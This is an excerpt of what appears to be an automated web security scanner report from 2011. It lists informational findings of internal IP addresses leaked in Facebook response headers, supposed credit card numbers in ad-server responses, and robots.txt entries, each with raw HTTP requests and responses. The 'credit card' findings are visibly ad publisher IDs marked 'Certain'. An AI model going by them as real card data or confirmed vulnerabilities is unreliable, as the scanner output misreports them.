Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 14:04:46 GMT
Content-Length: 48912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...

20.14. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.216.49

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.15. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.51.52

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.51.52
Connection: close
Date: Sun, 04 Sep 2011 14:06:39 GMT
Content-Length: 22

Invalid Application ID

20.16. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.185.54

Request

Response

20.17. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.173.52

Request

GET /extern/login_status.php?api_key=ac1665c9bd0f59bae26a1680350c04ab&app_id=ac1665c9bd0f59bae26a1680350c04ab&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15227b0dc%26origin%3Dhttp%253A%252F%252Fwww.scmagazine.com.au%252Ff10fb815d8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29eca2704%26origin%3Dhttp%253A%252F%252Fwww.scmagazine.com.au%252Ff10fb815d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df349be334%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3aba088c8%26origin%3Dhttp%253A%252F%252Fwww.scmagazine.com.au%252Ff10fb815d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df349be334&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df382486144%26origin%3Dhttp%253A%252F%252Fwww.scmagazine.com.au%252Ff10fb815d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df349be334&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30192dce8%26origin%3Dhttp%253A%252F%252Fwww.scmagazine.com.au%252Ff10fb815d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df349be334&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.173.52
X-Cnection: close
Date: Sun, 04 Sep 2011 12:14:34 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

20.18. http://www.facebook.com/home.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/home.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.222.56

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.19. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.3.56

Request

Response

20.20. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.182.40

Request

GET /plugins/like.php?href=http://reg.cx/1QvF&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=20 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/08/22/skype_security_bug/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

20.21. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.65.26.40

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12a3e0d3c%26origin%3Dhttp%253A%252F%252Fusa.kaspersky.com%252Ff3f7bb41a4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fusa.kaspersky.com%2Fproducts-services%2Fhome-computer-security%2Fmobile-security&layout=button_count&locale=en_US&node_type=link&ref=KMS&sdk=joey&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

20.22. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.65.19.64

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3274752a4%26origin%3Dhttp%253A%252F%252Fusa.kaspersky.com%252Ff14a280a04%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fusa.kaspersky.com%2Fproducts-services%2Fhome-computer-security%2Fpure&layout=button_count&locale=en_US&node_type=link&ref=PURE&sdk=joey&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT1673886
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

20.23. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.53.81

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38daabf7c%26origin%3Dhttp%253A%252F%252Fusa.kaspersky.com%252Ff37a4a94a8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fusa.kaspersky.com%2Fproducts-services%2Fhome-computer-security%2Fpure&layout=button_count&locale=en_US&node_type=link&ref=PURE&sdk=joey&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT1673886
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

20.24. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.40.91

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.40.91
Connection: close
Date: Sun, 04 Sep 2011 14:06:35 GMT
Content-Length: 26542

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

20.25. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.147.65

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.maas360.com%2F406.shtml&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.maas360.com/406.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

20.26. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.65.18.43

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d0c29ecc%26origin%3Dhttp%253A%252F%252Fusa.kaspersky.com%252Ff238f3d7f8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fusa.kaspersky.com%2Fproducts-services%2Fhome-computer-security%2Finternet-security&layout=button_count&locale=en_US&node_type=link&ref=KIS&sdk=joey&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

20.27. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.175.50

Request

GET /plugins/like.php?href=http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack&layout=button_count&show_faces=false&width=90&action=like&font&colorscheme=light&height=30 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

20.28. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.134.67

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.maas360.com%2F&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.maas360.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

20.29. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.164.48

Request

Response

20.30. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.170.42

Request

Response

20.31. http://www.facebook.com/share.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/share.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.217.64

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.217.64
Connection: close
Date: Sun, 04 Sep 2011 14:06:40 GMT
Content-Length: 0

20.32. http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/news-events/114520/kaspersky-website-vulnerable-to-xss.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.0.1

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:54:46 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Sun, 04 Sep 2011 13:54:46 GMT
Content-Type: text/html
Content-Length: 59029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en
...[SNIP]...
<a href="http://www.whatisnetwork.com/networking/basic-network/7533/ip-address-192-168-0-1.html" title="IP address 192.168.0.1">IP address 192.168.0.1</a>
...[SNIP]...

21. Credit card numbers disclosed previous next
There are 5 instances of this issue:

http://ad-emea.doubleclick.net/N6514/adj/uk/uk-security
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://lwn.net/Articles/456878/
http://virusalert.nl/

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

21.1. http://ad-emea.doubleclick.net/N6514/adj/uk/uk-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/N6514/adj/uk/uk-security

Issue detail

The following credit card number was disclosed in the response:

4634662068732588

Request

GET /N6514/adj/uk/uk-security;sz=300x250,336x280;tile=1;ord=1650919126? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Date: Sun, 04 Sep 2011 12:13:31 GMT
Server: cafe
Cache-Control: private
Content-Length: 407
X-XSS-Protection: 1; mode=block

document.write('\x3cscript type\x3d\x22text/javascript\x22\x3e\x3c!--\ngoogle_ad_client \x3d \x22ca-pub-4634662068732588\x22;\n/* mpu_uk_test */\ngoogle_ad_slot \x3d \x220615220379\x22;\ngoogle_ad_width \x3d 300;\ngoogle_ad_height \x3d 250;\n//--\x3e\n\x3c/script\x3e\n\x3cscript type\x3d\x22text/javascript\x22\nsrc\x3d\
...[SNIP]...

21.2. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The following credit card number was disclosed in the response:

4634662068732588

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 12:13:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 2753
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><iframe src="http://view.atdmt.com/AAS/iview/262448070/direct;wi.300;hi.250/01/2085102678?click=http://adclick.g.
...[SNIP]...
pdGVtL3BocE15QWRtaW4tdXBkYXRlcy1jbG9zZS1YU1MtaG9sZS0xMzMxMDkzLmh0bWy4AhjIAsXlgR6oAwHoA9gC6AO6AugD4AXoA90F6AMF9QMAAABA9QMgAAAAoAYR%26num%3D1%26sig%3DAOD64_2iDbKC1OYHekwzQS9IyMapHfsrow%26client%3Dca-pub-4634662068732588%26adurl%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">
...[SNIP]...
pdHkvbmV3cy9pdGVtL3BocE15QWRtaW4tdXBkYXRlcy1jbG9zZS1YU1MtaG9sZS0xMzMxMDkzLmh0bWy4AhjIAsXlgR6oAwHoA9gC6AO6AugD4AXoA90F6AMF9QMAAABA9QMgAAAAoAYR&num=1&sig=AOD64_2iDbKC1OYHekwzQS9IyMapHfsrow&client=ca-pub-4634662068732588&adurl=http://clk.atdmt.com/AAS/go/262448070/direct;wi.300;hi.250/01/" target="_blank">
...[SNIP]...
=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html%26hl%3Den%26client%3Dca-pub-4634662068732588%26adU%3Dwww.adt.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFVoP1_sXRrToUjoN_9AhRjpGspZw" target=_blank>
...[SNIP]...

21.3. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The following credit card number was disclosed in the response:

4358676377058562

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 12:13:07 GMT
Server: cafe
Cache-Control: private
Content-Length: 9613
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
K-6fv______wFgydb6hsijoBmgAfushPsDsgEHbHduLm5ldLoBCjEyMHgyNDBfYXPIAQHaAR9odHRwOi8vbHduLm5ldC9BcnRpY2xlcy80NTY4NzgvqAMByAMX6APgBegDugL1AwIAAMA&num=1&sig=AOD64_1b9pUYOiyGK4jnSJkWYO_1jCjAGg&client=ca-pub-4358676377058562&adurl=https://services.google.com/fb/forms/adwordscoupon/%3Fsite%3Dna-gdn-ctx-txt%26utm_term%3Dgdn-txt-ctx-3uc%26utm_source%3Dgdn-txt-ctx-3uc%26utm_medium%3Dad%26utm_campaign%3Den" id=aw0 onclick="ha(
...[SNIP]...
<a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://lwn.net/Articles/456878/%26hl%3Den%26client%3Dca-pub-4358676377058562%26adU%3Dwww.Google.com/AdWords%26adT%3DFree%2BOnline%2BAdvertising%26gl%3DUS&usg=AFQjCNEehJr46awPJ5oWqVgzM5WbjT6Tjw" target=_blank>
...[SNIP]...
s:smaRenderAds,getNextAdRequestUrl:smaGetNextAdRequestUrl,maxAds:2,handlerUrl:'http://googleads.g.doubleclick.net/pagead/ads',requestUrl:'http://googleads.g.doubleclick.net/pagead/ads?client\x3dca-pub-4358676377058562\x26format\x3d120x240_as\x26output\x3dhtml\x26h\x3d240\x26w\x3d120\x26lmt\x3d1315156423\x26channel\x3d0946045135\x26ad_type\x3dtext_image\x26color_bg\x3dffcc99\x26color_border\x3dffcc99\x26color_link\x
...[SNIP]...

21.4. http://lwn.net/Articles/456878/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lwn.net
Path:	/Articles/456878/

Issue detail

The following credit card number was disclosed in the response:

4358676377058562

Request

Response

21.5. http://virusalert.nl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://virusalert.nl
Path:	/

Issue detail

The following credit card number was disclosed in the response:

6531848790775800

Request

GET / HTTP/1.1
Host: virusalert.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22. Robots.txt file previous next
There are 81 instances of this issue:

http://a.dlqm.net/adscgen/log_error.php
http://a.tribalfusion.com/i.cid
http://account.theregister.co.uk/register/
http://action.media6degrees.com/orbserv/hbpix
http://ad-apac.doubleclick.net/adj/scmagazine/webclient
http://ad-emea.doubleclick.net/N6514/jump/uk/uk-security
http://ad.doubleclick.net/N6978/jump/reg_security/malware
http://ad.yieldmanager.com/pixel
http://adclick.g.doubleclick.net/aclk
https://adwords.google.com/um/StartNewLogin
http://amch.questionmarket.com/adsc/d921286/4/931683/adscout.php
http://api.addthis.com/oexchange/0.8/forward/email/offer
http://api.twitter.com/1/SCMagazineAU/lists/infosec/statuses.json
https://api.twitter.com/1/statuses/user_timeline.json
http://apnxscm.ac3.msn.com:81/CACMSH.ashx
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://b.voicefive.com/b
http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://buy.norton.com/ps_ant_de_de_eset
http://cdn.widgetserver.com/syndication/subscriber/Main.js
http://clients1.google.com/complete/search
http://clk.atdmt.com/MRT/go/341816816/direct
http://cm.g.doubleclick.net/pixel
http://code.google.com/apis/custom-search-ads/index.html
http://corsec.com/index.php
http://devirusare.com/x26amp
http://digg.com/submit
http://dna1.mookie1.com/n/97164/98396/www.bp.com/92rpd6
https://docs.google.com/
https://drh.img.digitalriver.com/store
http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js
http://en.wikipedia.org/wiki/Website#Product-_or_service-based_sites/x26amp
http://fls.doubleclick.net/activityj
http://forms.theregister.co.uk/mail_author/
http://forum.kaspersky.com/index.php
http://gcm.netmng.com/
https://github.com/mojombo/jekyll/wiki/sites+sites/x26amp
http://go.techtarget.com/clicktrack-r/activity/activity.gif
http://idgenterprise.112.2o7.net/b/ss/computerworldcom/1/H.20.3/s25338357510045
http://images.google.com/support/bin/answer.py
http://jlinks.industrybrains.com/jsct
http://kaplab.netmng.com/pixel/
http://kaspersky.ugc.bazaarvoice.com/8811/2000014/reviews.djs
http://l.addthiscdn.com/live/t00/152lo.gif
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://pagead2.googlesyndication.com/pagead/imgad
http://pixel.invitemedia.com/adnxs_sync
http://pixel.mathtag.com/event/img
http://pixel.quantserve.com/pixel
http://pto.digitalriver.com/trial/646/p/kaspersky_us_storepage.962/15/content.js
http://r.turn.com/r/beacon
http://rotation.linuxnewmedia.com/www/delivery/ajs.php
http://s0.2mdn.net/3130214/talarix3.swf
http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
http://spe.atdmt.com/ds/AAAASADTSADT/072711_ADT_Resi_99Hispanic/072611_ADT_Resi_99Hispanic_300x250.swf
https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809
http://support.kasperskyamericas.com/corporate/contact-information
http://t.widgetserver.com/t/image.gif
http://tag.admeld.com/pixel
http://techtarget-www.baynote.net/baynote/tags3/common
http://themes.googleusercontent.com/image
http://tr1.kaspersky.com/b/ss/kaspersky-usa/1/H.22.1/s25216629169881
